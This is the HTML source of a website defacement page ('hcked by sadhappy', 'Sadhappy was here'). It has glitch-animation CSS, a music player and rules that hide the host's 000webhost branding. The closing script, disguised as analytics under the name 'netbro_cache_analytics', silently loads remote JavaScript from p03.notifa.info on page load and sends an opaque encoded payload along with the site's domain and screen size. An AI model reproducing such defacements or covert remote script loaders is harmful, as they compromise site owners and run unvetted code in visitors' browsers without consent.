<html>
<head>
<title>hcked by sadhappy</title>
	<meta name='theme-color' content='black'/>
	<meta name="author" content="Sadhappy"/>
	<meta name="copyright" content="Sadhappy"/>
	<meta name="description" content="💤"/>
	<meta name="keywords" content="..."/>
	<meta property="og:title" content="Sadhapy was here"/>
	<meta property="og:description" content="💤"/>	
	<meta property="og:image" content=""/>
	<link href="https://l.top4top.io/p_1586rtdco1.gif" rel="icon" type="image/icon"/>
	<table width=100% height=100%>
	<td align="center">
<style>
html{background-image:url("https://k.top4top.io/p_15861ic5q0.gif");no-repeat;fixed;
-moz-background-size: cover;
-webkit-background-size: cover;
-o-background-size: cover;
background-height:100%;
background-position:right center;
background-size:cover;
            color: white;
            font-family: "Courier New";
            text-align: center;
        }
</style>
<style type="text/css">
window.onload = () => {
    let el = document.querySelector('[alt="www.000webhost.com"]').parentNode.parentNode;
    el.parentNode.removeChild(el);
}
div img[alt="www.000webhost.com"], div img[alt='www.000webhost.com'] {
 display:none;visibility:hidden;
}
img[alt*="www.000webhost.com"]{
display:none!important;
opacity:0;
}
img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"]{
display:none!important;
opacity:0;
}
.error {
  text-align: center;
  font-family: Courier New;
  -webkit-animation: noise-3 1s linear infinite;
          animation: noise-3 1s linear infinite;
  overflow: default;
}

@-webkit-keyframes noise-1 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: -6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: 2px;}
}

@keyframes noise-1 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: -6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: 2px;}
}

@-webkit-keyframes noise-2 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: 6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: -2px;}
}

@keyframes noise-2 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: 6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: -2px;}
}

@-webkit-keyframes noise {
  0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}  
  4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
}

@keyframes noise {
  0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}  
  4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
}

@-webkit-keyframes noise-3 {
  0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
}

@keyframes noise-3 {
  0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
}
</style>
<script type="text/javascript">function play(){ var audio = document.getElementById("audios"); audio.play();} function showImage(){ document.getElementById('loadingImage').style.visibility="visible"; } </script>
</head>
<body>
	<center>
<div class="error">
	<center><font style="font-size:59px">Sadhappy was here :):</font></div>
		<br>
		<br>
	<br><center><font style="font-size:50px">It's not your fault<br>
It's my own fault<br>
<strong>I'm not human at all</strong><br>
I have no heart</font>	
		<br>
		<br>
		<br>
<font size="5"> >>>>> </font><button class="btn btn-secondary btn-block bg-transparent mt-3" onclick="play();showImage();"><font color="black"><i class='fa fa-refresh fa-spin'></i>Play Music</font> </button><font size="5"> <<<<< </font>   <br/> <audio id="audios" src="https://d.top4top.io/m_1568crabi0.mp3"></audio>
		  
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXW0EzjponjDW70R5aYdtELHycVKNuYwrf3VOxTew59qXLM4SQ8kvpamgnhZ%2beyapx2%2bJVY%2fb3S5S1a7dQjoHLlDn1DGkTJaFO1Dakl2c79TppNe3pFbhiilHnI6s8hyJ0xMyV%2ffjScll3qpTbxk33e5pSq4jzyQ5iIy7gg6nc1PWJBSBf2Eyluj%2fS%2fViAyztFqtQT4KoZemChzPSQWln%2bY3CEeBR3eXMgvS7DpoyT%2fCR0Kx6ldbAX3drWIL5Pnl4XiWDAo3JBQQc9koPi6W%2bGsZ%2bMftR5mRH%2bUReV0xTa0FVPblxH%2fqk9xDo0fafpSM1I%2fPVKWgkwG5nHihj9tzYOKd9UtyNi8XfkhZKmHDCUeKwyCHfepmRSqaVhtsob3ZQW6A8wCC2l1%2fFndRif1QTplwhycl4ZcNjq%2bpzKnj9HJSodRQ%2bNm7fEizgk2jfCCjKhYmHyN3wt%2bxGo0jsgZah23YxrPgeF54%2fjOqIuVeXs0wbcbg%2fO2qJS%2bwvdOxlfqO095JrQVnVPUesUxgt7vno%2f8Jde2zstlijoUpPVs1ICCedflNSarO%2fz0ioeBDOxC9GrQgKI1lwgVK5NaF2CoAgs%2bQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>